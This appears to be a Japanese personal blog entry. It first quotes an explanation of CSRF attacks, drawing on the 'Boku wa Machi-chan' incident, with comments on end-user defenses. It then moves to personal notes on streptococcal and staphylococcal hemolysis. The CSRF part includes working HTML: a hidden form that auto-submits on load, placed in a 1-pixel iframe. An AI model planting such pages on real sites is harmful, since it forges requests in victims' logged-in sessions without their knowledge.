大したスクリプトでも技術でもないのに、名前だけ大層な。
http://
----
簡単な HTML を例示して、その原理を具体的に解説する。
attack.html
<!DOCTYPE html>
<html lang="ja">
<head>
<title>攻撃用のページ</title>
</head>
<body onload="document.attackform.submit();">
<form name="attackform" method="post" action="http://example .com/bb s/regis ter.cgi ">
<input type="hidden" name="title" value="攻撃者が指定した題名">
<input type="hidden" name="article" value="攻撃者が指定した本文">
<input type="submit" value="送信">
</form>
</body>
</html>
clickme.html
<!DOCTYPE html>
<html lang="ja">
<head>
<title>誘導用のページ</title>
</head>
<body>
<p>ようこそいらっしゃいました。</p>
<iframe width="1" height="1" src="attack.html"></iframe>
</body>
</html>
第三者が clickme.html にアクセスすると、以下のような流れで http://
clickme.html のインラインフレーム内で attack.html が呼び出される。
attack.html の body 要素に指定された onload 属性により、ページが読み込まれるのと同時に、そのページ内のフォームの送信ボタンが自動的に押下される。
http://
なお、これらの出来事はすべて clickme.html 内に存在する 1 ピクセル四方のインラインフレームで行われるため、被害者に攻撃を受けたことを気付かれにくくなっている。「ぼくはまちちゃん」騒動で使用された攻撃では、インラインフレームの代わりに img タグを利用した巧妙な偽装が行われていた。
-----
原始的やなあ。バックドアのパターンと、Javascriptのパターンと2つあったという結論か。
「ぼくはまちちゃん」 ――知られざるCSRF攻撃
http://
「■エンドユーザーのCSRF対策
常に「CSRFを巧みに実行させるわな」に挙げた項目を疑ってかかれといいたいが、そんなことをしていては、まともにWebページを見ることができなくなってしまう。残念ながら、エンドユーザー自身にできるCSRF対策は、小まめにログアウトし必要なときにログインするという手段ぐらいしかない。しかし、この方法ですらエンドユーザーにとってはWebの利便性を十分に損なうものなので、実際に対策するユーザーは少ないだろう。」
そうさな。運営側の問題。自分がどのサイトを認証してクッキーにパスワードを記憶させているかを認識した上で、怪しげなリンク先へ飛ぶべき。
具体的には2chはシークレットモードでいきゃあ、クッキーを引っ張らないか。面倒ですね。
さて、大したことない結論がでたところで、何をするかじゃなー。
13時に新車を取りに行くとして、
溶血どうするか。。。。
「レンサ球菌属では、歴史的に種間の分類の指標として用いられ、α溶血性のものを、α溶レン菌(α溶血性レンサ球菌)、または緑レン菌(緑色レンサ球菌、"Streptococcus viridans)、β溶血性のものをβ溶レン菌、または単に溶レン菌と大別した。この便宜的な分類群は臨床分野では未だに頻用されており、後の生物学的な分類体系にも反映されている。
また、レンサ球菌属のうち、ストレプトコッカス・アガラクチアエ(S. agalactiae、B群β溶血性レンサ球菌)は、単独ではαないしα'型の不完全な溶血性を示すが、黄色ブドウ球菌のβ溶血素の共存下では、本菌の弱いβ溶血素の活性が増強されて、結果として強いβ溶血を示すようになる。この現象はCAMP試験[2]と呼ばれ、本菌を同定する際の指標として利用されている。」
ブドウ球菌は必ずβ溶血なのかどうか?
~血液寒天培地とチョコレ-ト寒天培地~
関西医大香里病院 中矢秀雄
http://
やっぱりβ溶血よなあ。
http://
戸田細菌学では、血清型によって異なったり、生物型で異なったりとある。結構記述がばらつく。4度でしか溶血しないわけでもないらしい。
実際使っている会社を信用して、ベータ溶血はブ菌と考えるべきだろう。
月曜、病院のラボ結果と照らし合わせる。
